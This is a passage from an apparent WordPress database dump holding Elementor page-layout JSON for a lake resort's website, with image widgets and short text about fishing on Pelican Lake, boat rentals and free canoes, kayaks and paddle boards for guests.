yresort.com\\/wp-content\\/uploads\\/2017\\/01\\/all-kins-of-pics-009.jpg\",\"id\":340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ad64e1\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9407d0d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9681148\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4cb9f69\"}]},\"elements\":[{\"id\":\"a15b9be\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2026256\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"07237f5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f6e053a\"}]},\"elements\":[{\"id\":\"bc25866\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/all-kins-of-pics-012.jpg\",\"id\":341}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"f546c7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"164367c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61d1cf0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"fe02551\"}]},\"elements\":[{\"id\":\"8db9738\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/ResortPics.jpg\",\"id\":308}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d234255\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"421963b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"545c59d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3b08ea5\"}]},\"elements\":[{\"id\":\"aac74de\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Kussatz.jpg\",\"id\":298}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"997b9fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3e8b38a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bc5e9d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"47e0a38\"}]},\"elements\":[{\"id\":\"e54b73a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/06\\/DSCN2502.jpg\",\"id\":204}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c97804\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"11a63fa\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e62a9be\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8f107cf\"}]},\"elements\":[{\"id\":\"dfec8d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d31d12c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"af7353b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d0b3b35\"}]},\"elements\":[{\"id\":\"0b35019\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3572.jpg\",\"id\":270}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"87f5b0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/06\\/IMG_2905.jpg\",\"id\":873}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"509de7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"299a10a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e4da443\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"26eb2dd\"}]},\"elements\":[{\"id\":\"6793696\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3601.jpg\",\"id\":169}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"76d42c8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2605.jpg\",\"id\":176}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"f0e6f3c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"94d196a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6775c1a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c1eb986\"}]},\"elements\":[{\"id\":\"95541c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3611.jpg\",\"id\":170}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7395e62\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/06\\/62208139_2851471431591627_415800096072925184_n.jpg\",\"id\":872}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5059136\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f79900a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c62f6fe\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"03f9966\"}]},\"elements\":[{\"id\":\"b8cd8b3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/06\\/IMG_2971.jpg\",\"id\":874}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b577c8c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"021ef74\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1b48237\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"315f485\"}]},\"elements\":[{\"id\":\"32dfd9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9e22c3f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a9d368f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5526c8c\"}]},\"elements\":[{\"id\":\"1a58fd3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3810.jpg\",\"id\":495}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9318e77\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c458907\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ce9fbab\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ec695bc\"}]},\"elements\":[{\"id\":\"891ac80\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3598.jpg\",\"id\":493}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ba07af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b38d892\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d2534d1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"129c6ce\"}]},\"elements\":[{\"id\":\"260f883\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3565.jpg\",\"id\":490}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d643c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0b34039\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0408d03\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a474735\"}]},\"elements\":[{\"id\":\"a0b27ca\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3540.jpg\",\"id\":489}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eb81b03\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7aa2fd3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e596e7c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b1b9de5\"}]},\"elements\":[{\"id\":\"b77d62a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b5efcf7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"92f19c4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6947ee9\"}]},\"elements\":[{\"id\":\"4a4a9e2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/06\\/IMG_2933.jpg\",\"id\":875}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"774d3f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8258c6f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9aa1d2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"21f8b67\"}]},\"elements\":[{\"id\":\"1292ee5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/2008-088.jpg\",\"id\":105}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"37d43aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"78ff838\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8f89e7a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38c4cb9\"}]},\"elements\":[{\"id\":\"6ea5dc9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3480.jpg\",\"id\":355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"288c56e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2fdbe18\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"984dd77\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"7d5d219\"}]},\"elements\":[{\"id\":\"9ca33fb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/boxmeyer-group.jpg\",\"id\":279}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b3d678\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3442456\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"22ea8d6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"34881c4\"}]},\"elements\":[{\"id\":\"58b2643\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b073176\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"26e79f9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a64f106\"}]},\"elements\":[{\"id\":\"f687d69\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pelican lake has wonderful walleye, bass, northern, crappie and sunfish.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2752,877,'_wp_page_template','default'),(2753,877,'_elementor_edit_mode','builder'),(2754,877,'_elementor_template_type','post'),(2755,877,'_elementor_data','[{\"id\":\"86ecb3f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8a45f64\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"142d45e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3d072d4\"}]},\"elements\":[{\"id\":\"7e4ba31\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"84ad9d6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8aaa860\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"619f46d\"}]},\"elements\":[{\"id\":\"3a53155\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2018\\/04\\/20Foot.png\",\"id\":701},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1ab4587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">20 foot pontoon With 25 HP Yamaha 4 stroke Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"706d39a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"48d8414\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c530bfd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6edda1c\"}]},\"elements\":[{\"id\":\"9bcae90\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN2723.jpg\",\"id\":549},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"84b34fe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">14 foot Lund Fishing Boat with 15 HP Yamaha Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34966cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"80347fe\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"02046c5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1893353\"}]},\"elements\":[{\"id\":\"403ea9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b555a73\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ecce2ec\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"097b1aa\"}]},\"elements\":[{\"id\":\"d260d09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3711.jpg\",\"id\":494}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3529b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE USE OF THE PADDLE BOAT<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eefc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9de916f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"f334c4c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"75e0743\"}]},\"elements\":[{\"id\":\"991c5f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3841.jpg\",\"id\":497}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"340682a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LAUNCH ON SITE $10.00 ONE TIME CHARGE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99b8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"11b94d2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"da4d017\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"abd79ac\"}]},\"elements\":[{\"id\":\"795afe3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC04860.jpg\",\"id\":348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"11200cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE CANOE AND KAYAK USE TO ALL GUESTS<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36e1853\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"cbc097a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6c8184f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2ed5a11\"}]},\"elements\":[{\"id\":\"c1238f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a28b037\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"63eca3b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"13e791a\"}]},\"elements\":[{\"id\":\"a7630d3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3828.jpg\",\"id\":552}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"017271e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE PADDLE BOARD FOR GUESTS<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fb16710\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1ccf64d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4ce0da8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"db765d1\"}]},\"elements\":[{\"id\":\"c08c13b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSC0342.jpg\",\"id\":550}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"887e12c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LIFT RENTAL<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ad760a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"71b87fc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c7ff68d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d88c0cd\"}]},\"elements\":[{\"id\":\"e02420b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3462.jpg\",\"id\":551}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"87a5746\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">PLENTY OF BOAT SLIPS AVAILABLE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89ddcdd\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4802a00\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"94bd481\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d562f41\"}]},\"elements\":[{\"id\":\"bd63f53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"65bbf44\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c90a3a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d726c85\"}]},\"elements\":[{\"id\":\"c4fdd4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>You can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks, paddle boards, canoes or paddle boat<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2756,877,'_elementor_version','2.5.15'),(2759,878,'_wp_page_template','default'),(2760,878,'_elementor_edit_mode','builder'),(2761,878,'_elementor_template_type','post'),(2762,878,'_elementor_data','[{\"id\":\"86ecb3f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8a45f64\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"142d45e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3d072d4\"}]},\"elements\":[{\"id\":\"7e4ba31\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"84ad9d6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8aaa860\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"619f46d\"}]},\"elements\":[{\"id\":\"3a53155\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2018\\/04\\/20Foot.png\",\"id\":701},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1ab4587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">20 foot pontoon With 25 HP Yamaha 4 stroke Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"706d39a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"48d8414\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c530bfd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6edda1c\"}]},\"elements\":[{\"id\":\"9bcae90\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN2723.jpg\",\"id\":549},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"84b34fe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">14 foot Lund Fishing Boat with 15 HP Yamaha Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34966cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"80347fe\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"02046c5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1893353\"}]},\"elements\":[{\"id\":\"403ea9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b555a73\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ecce2ec\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"097b1aa\"}]},\"elements\":[{\"id\":\"d260d09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3711.jpg\",\"id\":494}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3529b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE USE OF THE PADDLE 